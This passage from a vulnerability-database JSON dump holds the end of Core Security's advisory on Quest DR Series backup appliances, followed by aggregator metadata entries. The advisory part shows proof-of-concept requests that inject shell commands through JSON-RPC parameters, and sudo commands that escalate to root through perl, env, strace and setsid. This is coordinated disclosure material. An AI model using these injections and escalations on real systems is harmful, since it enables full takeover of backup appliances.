diagnostic information and configuration settings, which are then transmitted to Quest in order to help troubleshoot system problems.\n\nThe subroutine implementing the registration functionality with the Support Portal was found to be vulnerable to command injection via the 'email' parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 111\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"register\",\n \"params\": {\n \"classname\": \"DRSupportPortal\",\n \"email\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.44. Command injection in the setDateAndTime method\n\n[[CVE-2018-11186](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11186>)] Attackers can execute arbitrary system commands by configuring a custom timezone.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 115\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"setDateAndTime\",\n \"params\": {\n \"classname\": \"DRDateTime\",\n \"timezone\": \"; sleep 10; #\"\n },\n \"id\": 1\n }\n \n\n### 7.45. Command injection in the global view add_member method\n\n[[CVE-2018-11187](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11187>)] GlobalView is a dashboard view providing a global picture of all the DR Series systems in an organization. The functionality to add a new system was found to be vulnerable to command injection via the 'RemoteHost' parameter.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 165\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"add_member\",\n \"params\": {\n \"classname\": \"DRGlobalView\",\n \"UserName\": \"pepito\",\n \"Password\": \"pepito123\",\n \"RemoteHost\": \"; sleep 10; echo \"\n },\n \"id\": 1\n }\n \n\n### 7.46. Command injection in the global view reconnect_member method\n\n[[CVE-2018-11188](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11188>)] Reconnecting a disconnected system in the Global View page can also result in arbitrary command execution.\n\nProof of concept:\n \n \n POST /ws/v1.0/jsonrpc HTTP/1.1\n Host: 192.168.1.39\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: <https://192.168.1.39/>\n Content-Type: application/json-rpc\n SessionCookie: e2de614014605fc5115fd72076aa827e\n Content-Length: 171\n Connection: close\n \n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"reconnect_member\",\n \"params\": {\n \"classname\": \"DRGlobalView\",\n \"UserName\": \"pepito\",\n \"Password\": \"pepito123\",\n \"RemoteHost\": \"; sleep 10; echo \"\n },\n \"id\": 1\n }\n \n\n### 7.47. Privilege escalation from web server user to root via perl\n\n[[CVE-2018-11189](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11189>)] The web server is running as the webadmin user. Exploiting any of the command injection vulnerabilities oulined in the previous sections would then result in 'webadmin' level access.\n\nThe webadmin user has sudo access to run the perl interpreter as root, presumably to operate the various scripts that are called from the web application. However, this means that an attacker who manages to execute code in the context of the web server can easily escalate user privileges to root by running arbitrary code via the perl interpreter.\n \n \n sh-3.2$ id\n uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)\n sh-3.2$ sudo perl -e 'system(\"/bin/bash\")'\n \n id\n uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\n \n\n### 7.48. Privilege escalation from web server user to root via env\n\n[[CVE-2018-11190](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11190>)] The webadmin user has sudo access to run the /bin/env binary with root permissions, resulting in direct privilege escalation.\n \n \n webadmin@dr2k-1thv-dsmoke-01 > sudo env -i /bin/sh\n sh-3.2# id\n uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\n \n\n### 7.49. Privilege escalation from web server user to root via local scripts\n\n[[CVE-2018-11191](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11191>)] The webadmin user is allowed to run local configuration scripts located in /usr/local/bin with root level permissions and without requiring a password. In particular, there is an 'exec.sh' shell script that allows users to execute arbitrary commands. Because it can be run via sudo, this results once again in privilege escalation to root.\n \n \n webadmin@dr2k-1thv-dsmoke-01 > id\n uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)\n webadmin@dr2k-1thv-dsmoke-01 > sudo /usr/local/bin/exec.sh /bin/bash\n \n NOTICE: To capture 'service' session output please use 'capture' command.\n Type 'exit' to stop the capture.\n \n Total alert messages : 0\n \n service@dr2k-1thv-dsmoke-01 > id\n uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\n \n\n### 7.50. Privilege escalation from web server user to root via strace\n\n[[CVE-2018-11192](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11192>)] The strace binary can be run by the webadmin user with root privileges. In reality, this means that arbitrary processes are run as root, opening another vector to escalate privileges once the web server is compromised.\n \n \n webadmin@dr2k-1thv-dsmoke-01 > id\n uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)\n webadmin@dr2k-1thv-dsmoke-01 > sudo strace /usr/bin/id\n [...]\n read(3, \"root:x:0:root,admin,administrato\"..., 4096) = 731\n close(3) = 0\n munmap(0x2ba34633d000, 4096) = 0\n write(1, \"uid=0(root) gid=0(root) groups=0\"..., 88uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\n ) = 88\n close(1) = 0\n munmap(0x2ba34633c000, 4096) = 0\n exit_group(0) = ?\n \n\n### 7.51. Privilege escalation from web server user to root via ocashell\n\n[[CVE-2018-11193](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11193>)] The ocashell script located in the /usr/local/bin directory spawns a bash shell and can be executed by the webadmin user via sudo. This results in a command line shell with root privileges.\n \n \n webadmin@dr2k-1thv-dsmoke-01 > sudo /usr/local/bin/ocashell \n \n NOTICE: To capture 'service' session output please use 'capture' command.\n Type 'exit' to stop the capture.\n \n Total alert messages : 0\n \n service@dr2k-1thv-dsmoke-01 > id\n uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\n \n\n### 7.52. Privilege escalation from web server user to root via setsid\n\n[[CVE-2018-11194](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11194>)] Another command that can be run via sudo once code execution as the webadmin user is achieved is the /usr/bin/setsid binary. This binary is used to run a program in a new session, resulting in local privilege escalation to root.\n \n \n webadmin@dr2k-1thv-dsmoke-01 > sudo /usr/bin/setsid id > /tmp/pepito \n webadmin@dr2k-1thv-dsmoke-01 > cat /tmp/pepito\n uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\n \n\n## 8\\. Report Timeline\n\n * **2018-01-31: **Core Security sent an initial notification to Quest Software Inc. (Quest), asking for GPG keys in order to send draft advisory.\n * **2018-01-31: ** Quest Support answered asking for the advisory in clear text.\n * **2018-01-31: **Core Security sent the draft advisory in clear text form.\n * **2018-01-31: ** Quest Support replied that they received the draft advisory and that they would review it.\n * **2018-02-07: **Core Security requested an update from Quest regarding the reported vulnerabilities and a tentative schedule.\n * **2018-02-07: ** Quest Support answered that it opened a bug id to track the fixes and asked Core Security for a tentative publication date.\n * **2018-02-07: **Core Security answered saying that its intention is to coordinate the release in conjunction adjusting the schedule to the Quest's development timeline.\n * **2018-02-08: ** Quest Support replied that engineering is testing the fixes and they should have an estimate timeline the week of 12 February.\n * **2018-02-15: **Core Security requested a status update.\n * **2018-02-22: **Core Security again requested a status update and an estimated timescale.\n * **2018-02-22: ** Quest Support answered that it is trying to get an update from the engineering team.\n * **2018-03-01: **Core Security requested a status update and a solidified timeline.\n * **2018-03-01: ** Quest Support replied saying that engineering is planning to have a patch ready by the end of March.\n * **2018-03-01: **Core Security thanked the follow up and replied saying that it will contact Quest in two weeks.\n * **2018-03-15: **Core Security requested a status update.\n * **2018-03-26: **Core Security requested a status update again.\n * **2018-03-26: ** Quest Support answered saying it will get an update from the engineering team.\n * **2018-04-10: ** Quest Support informed that the latest build 4.0.3.1 addresses the vulnerabilities that were reported.\n * **2018-04-10: **Core Security asked if all the vulnerabilities reported are addressed by this build.\n * **2018-05-31: ** Advisory CORE-2018-0002 published.\n\n## 9\\. References\n\n[1] <https://www.quest.com/products/dr-series-disk-backup-appliances/>\n\n## 10\\. About CoreLabs\n\nCoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: <http://corelabs.coresecurity.com>.\n\n## 11\\. About Core Security\n\nCore Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity &amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.\n\nCore Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [info@coresecurity.com](<mailto:info@coresecurity.com>)\n\n## 12\\. Disclaimer\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>\n\n## 13\\. PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security advisories team, which is available for download at <http://www.coresecurity.com/files/attachments/core_security_advisories.asc>.\n", "edition": 1, "reporter": "Core Security", "published": "2018-05-31T00:00:00", "title": "Quest DR Series Disk Backup Multiple Vulnerabilities", "type": "coresecurity", "enchantments": {"score": {"modified": "2018-05-31T20:39:01", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": [], "modified": "2018-05-22T00:00:00", "id": "CORE-2018-0002", "href": "https://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities", "cvss": {}}], "zdt": [{"lastseen": "2018-06-01T05:11:18", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "Core Security", "published": "2018-05-31T00:00:00", "title": "Quest DR Series Disk Backup Software 4.0.3 Code Execution Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-06-01T05:11:18", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11157", "CVE-2018-11147", "CVE-2018-11143", "CVE-2018-11151", "CVE-2018-11153", "CVE-2018-11156", "CVE-2018-11145", "CVE-2018-11155", "CVE-2018-11150", "CVE-2018-11148", "CVE-2018-11146", "CVE-2018-11149", "CVE-2018-11152", "CVE-2018-11158", "CVE-2018-11154", "CVE-2018-11144"], "modified": "2018-05-31T00:00:00", "id": "1337DAY-ID-30514", "href": "https://0day.today/exploit/description/30514", "sourceData": "Quest DR Series Disk Backup Multiple Vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Quest DR Series Disk Backup Multiple Vulnerabilities\r\nAdvisory ID: CORE-2018-0002\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities\r\nDate published: 2018-05-31\r\nDate of last update: 2018-05-22\r\nVendors contacted: Quest Software Inc.\r\nRelease mode: Forced release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\r\n[CWE-78], Execution with Unnecessary Privileges [CWE-250], Execution with\r\nUnnecessary Privileges [CWE-250], Execution with Unnecessary Privileges\r\n[CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with\r\nUnnecessary Privileges [CWE-250], Execution with Unnecessary Privileges\r\n[CWE-250]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: Yes\r\nCVE Name: CVE-2018-11143, CVE-2018-11144, CVE-2018-11145, CVE-2018-11146,\r\nCVE-2018-11147, CVE-2018-11148, CVE-2018-11149, CVE-2018-11150,\r\nCVE-2018-11151,\r\nCVE-2018-11152, CVE-2018-11153, CVE-2018-11154, CVE-2018-11155,\r\nCVE-2018-11156,\r\nCVE-2018-11157, CVE-2018-11158, CVE-2018-11159, CVE-2018-11160,\r\nCVE-2018-11161,\r\nCVE-2018-11162, CVE-2018-11163, CVE-2018-11164, CVE-2018-11165,\r\nCVE-2018-11166,\r\nCVE-2018-11167, CVE-2018-11168, CVE-2018-11169, CVE-2018-11170,\r\nCVE-2018-11171,\r\nCVE-2018-11172, CVE-2018-11173, CVE-2018-11174, CVE-2018-11175,\r\nCVE-2018-11176,\r\nCVE-2018-11177, CVE-2018-11178, CVE-2018-11179, CVE-2018-11180,\r\nCVE-2018-11181,\r\nCVE-2018-11182, CVE-2018-11183, CVE-2018-11184, CVE-2018-11185,\r\nCVE-2018-11186,\r\nCVE-2018-11187, CVE-2018-11188, CVE-2018-11189, CVE-2018-11190,\r\nCVE-2018-11191,\r\nCVE-2018-11192, CVE-2018-11193, CVE-2018-11194\r\n\r\n3. *Vulnerability Description*\r\n\r\nQuest's website states that:\r\n \r\n\"The Quest DR Series of disk backup appliances [1] are engineered to handle\r\nhundreds of incoming backup streams with an all-inclusive software solution\r\nthat simplifies management of backups, giving you more time to focus on\r\nother tasks.\r\n\r\nThe appliances work in conjunction with backup software applications to\r\nensure data written to disks is protected for reliable recovery. New\r\nfeatures such as storage groups, secure erase and user management give you\r\nthe flexibility to tailor utilization policies to fit your organization's\r\nspecific requirements.\r\n\r\nWith Quest DR Series appliances, you can:\r\n \r\n- Back up more of your servers and applications - with support for more\r\nthan 15 backup applications and enhanced security features such as\r\nencryption at rest and secure erase.\r\n\r\n- Store less backup data - using variable block, in-line deduplication\r\nand compression to lower backup storage requirements by an average of\r\n20:1 at an average cost of $.05 - $.17/GB.\r\n\r\n- Perform better during data ingest and management - with built-in\r\naccelerators, logical storage groups and support for Fibre Channel\r\nconnectivity and virtual tape libraries (VTLs).\"\r\n\r\nMultiple vulnerabilities were found in the Quest DR Series Disk Backup\r\nsoftware that would allow remote attackers to execute arbitrary system\r\ncommands on the appliance with root permissions.\r\n\r\nNote: This advisory has limited details on the vulnerabilities because\r\nduring an attempted coordinated disclosure process for other advisory,\r\nQuest advised us not to distribute our original findings to the public or\r\nelse they would take legal action.\r\nQuest's definition of \"responsible disclosure\" can be found at\r\nhttps://support.quest.com/essentials/reporting-security-vulnerability.\r\n\r\nCoreLabs has been publishing security advisories since 1997 and believes\r\nin coordinated disclosure and good faith collaboration with software vendors\r\nbefore disclosure to help ensure that a fix or workaround solution is\r\nready and available when the vulnerability details are publicized. We\r\nbelieve that providing technical details about each finding is necessary\r\nto provide users and organizations with enough information to understand\r\nthe implications of the vulnerabilities against their environment and,\r\nmost importantly, to prioritize the remediation activities aiming at\r\nmitigating risk.\r\n\r\nWe regret Quest's posture on disclosure and the lack of a possibility of\r\nengaging into a coordinated publication date, something we achieve (and\r\nhave achieved) with many vendors as part of our coordinated disclosure\r\npractices.\r\n \r\n4. *Vulnerable Packages*\r\n\r\n. Quest DR Series Disk Backup Software 4.0.3\r\nOther products and versions might be affected, but they were not tested.\r\n\r\n5. *Vendor Information, Solutions and Workarounds*\r\n\r\nQuest has released the build 4.0.3.1 that address the reported\r\nvulnerabilities.\r\nBuild can be download at:\r\n\r\n. For DR4300e, DR4300, and DR6300:\r\nhttps://support.quest.com/download-install-detail/6085865\r\n. For DR4000, DR4100, DR6000:\r\nhttps://support.quest.com/download-install-detail/6085802\r\n\r\nFor more details, Quest published the following Release Note:\r\nhttps://support.quest.com/technical-documents/dr-series-software/4.0.3.1/release-notes/\n\n# 0day.today [2018-06-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30514"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:02", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32660", "https://vulners.com/securityvulns/securityvulns:doc:32549"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-11-02T00:00:00", "title": "apport security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:02", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Apport", "version": "2.18", "operator": "eq"}], "cvelist": ["CVE-2015-1338"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "description": "PHAR extension DoS.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-11-02T00:00:00", "title": "PHP security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:03", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PHP", "version": "5.6", "operator": "eq"}], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32652"], "description": "Crash on audiofiles processing.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-11-02T00:00:00", "title": "audiofile memory corruption", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:03", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "libaudiofile", "version": "0.3", "operator": "eq"}], "cvelist": ["CVE-2015-7747"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32657", "https://vulners.com/securityvulns/securityvulns:doc:32654", "https://vulners.com/securityvulns/securityvulns:doc:32655", "https://vulners.com/securityvulns/securityvulns:doc:32656", "https://vulners.com/securityvulns/securityvulns:doc:32658", "https://vulners.com/securityvulns/securityvulns:doc:32659", "https://vulners.com/securityvulns/securityvulns:doc:32653"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "reporter": "ORACLE", "published": "2015-11-02T00:00:00", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:03", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PeopleSoft Enterprise HCM Talent Acquistion Managment", "version": "9.2", "operator": "eq"}, {"name": "Endeca Server", "version": "7.6", "operator": "eq"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "eq"}, {"name": "Oracle Traffic Director", "version": "11.1", "operator": "eq"}, {"name": "Java SE", "version": "8", "operator": "eq"}, {"name": "Oracle Communications LSMS", "version": "13.1", "operator": "eq"}, {"name": "Oracle Communications Messaging Server", "version": "8.0", "operator": "eq"}, {"name": "Oracle Enterprise Data Quality", "version": "12.1", "operator": "eq"}, {"name": "PeopleSoft Enterprise FSCM", "version": "9.2", "operator": "eq"}, {"name": "Hyperion Installation Technology", "version": "11.1", "operator": "eq"}, {"name": "Oracle", "version": "12.1", "operator": "eq"}, {"name": "Java SE Embedded", "version": "8", "operator": "eq"}, {"name": "Outside In Technology", "version": "8.5", "operator": "eq"}, {"name": "Exalogic Infrastructure", "version": "2.0", "operator": "eq"}, {"name": "Oracle", "version": "11.2", "operator": "eq"}, {"name": "Oracle Retail Returns Management", "version": "14.0", "operator": "eq"}, {"name": "Oracle E-Business Suite", "version": "12.2", "operator": "eq"}, {"name": "Solaris", "version": "11.2", "operator": "eq"}, {"name": "MySQL Enterprise Monitor", "version": "3.0", "operator": "eq"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "eq"}, {"name": "Oracle Agile PLM", "version": "9.3", "operator": "eq"}, {"name": "PeopleSoft Enterprise HCM", "version": "9.2", "operator": "eq"}, {"name": "Oracle WebCenter Content", "version": "10.1", "operator": "eq"}, {"name": "Oracle Configurator", "version": "12.2", "operator": "eq"}, {"name": "Oracle Communications Performance Intelligence Center Software", "version": "10.1", "operator": "eq"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "7.1", "operator": "eq"}, {"name": "Oracle Identity Manager", "version": "11.1", "operator": "eq"}, {"name": "Enterprise Manager Base Platform", "version": "12.1", "operator": "eq"}, {"name": "FS1-2 Flash Storage System", "version": "6.3", "operator": "eq"}, {"name": "Integrated Lights Out Manager", "version": "3.2", "operator": "eq"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1", "operator": "eq"}, {"name": "OSS Support Tools", "version": "8.8", "operator": "eq"}, {"name": "Oracle Retail Back Office", "version": "14.0", "operator": "eq"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.2", "operator": "eq"}, {"name": "Oracle Communications Tekelec HLR Router", "version": "4.0", "operator": "eq"}, {"name": "VirtualBox", "version": "5.0", "operator": "eq"}, {"name": "MySQL Server", "version": "5.6", "operator": "eq"}, {"name": "PeopleSoft Enterprise FIN Expenses", "version": "9.2", "operator": "eq"}, {"name": "GlassFish Server", "version": "3.1", "operator": "eq"}, {"name": "Oracle Mobile Security Suite", "version": "3.0", "operator": "eq"}, {"name": "Oracle Communications User Data Repository", "version": "10.2", "operator": "eq"}, {"name": "Oracle Communications Convergence", "version": "3.0", "operator": "eq"}, {"name": "Oracle Access Manager", "version": "11.1", "operator": "eq"}, {"name": "JDeveloper", "version": "12.1", "operator": "eq"}, {"name": "Oracle Mobile Server", "version": "12.1", "operator": "eq"}, {"name": "Oracle Utilities Work and Asset Management", "version": "1.9", "operator": "eq"}, {"name": "Oracle Communications Policy Management", "version": "12.1", "operator": "eq"}, {"name": "Oracle WebCenter Sites", "version": "11.1", "operator": "eq"}, {"name": "JavaFX", "version": "2.2", "operator": "eq"}, {"name": "Fusion Middleware", "version": "12.1", "operator": "eq"}, {"name": "Siebel Applications", "version": "2015", "operator": "eq"}, {"name": "Oracle HTTP Server", "version": "12.1", "operator": "eq"}, {"name": "Oracle Retail Central Office", "version": "14.0", "operator": "eq"}, {"name": "Enterprise Manager Ops Center", "version": "12.2", "operator": "eq"}, {"name": "JRockit", "version": "28.3", "operator": "eq"}, {"name": "Oracle Fusion Applications", "version": "11.1", "operator": "eq"}, {"name": "Oracle Retail Open Commerce Platform", "version": "3.0", "operator": "eq"}], "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", 